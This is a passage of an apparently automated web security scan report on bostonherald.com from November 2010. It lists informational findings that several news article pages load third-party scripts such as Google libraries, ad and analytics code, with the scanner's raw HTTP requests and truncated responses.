<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.138. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.139. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.140. http://bostonherald.com/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107moving_day_for_hope_homeowners/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.141. http://bostonherald.com/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107moving_day_for_hope_homeowners/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107moving_day_for_hope_homeowners/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:17:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.142. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.143. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.144. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 85702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.145. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
